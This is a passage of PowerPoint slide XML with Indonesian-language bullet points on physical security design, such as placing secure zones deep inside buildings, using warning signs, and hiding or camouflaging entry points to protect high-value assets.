            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dihadapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kendala</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kembali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prinsip-prinsip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Letakkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zona </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ruang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bangunan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hindari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dinding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pintu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jendela</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksternal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Gunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>desain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zona </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>demiliterisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ruang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Posisikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> area </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> agar para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tamu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lewat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dekat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zona </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mekanisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di area </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlihat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jelas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencegahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Gunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>papan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> nama dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peringatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menegakkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gagasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilarang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rumah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kantor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memasang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meyakinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyusup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebaliknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zona </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>haruslah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersembunyi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Jangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyusup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesempatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memeriksa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mekanisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zona </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengetahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Gunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kamuflase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>industri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bangunan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gerbang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bernilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencolok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> buat area </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>visibilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menarik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perhatian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Cobalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meminimalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
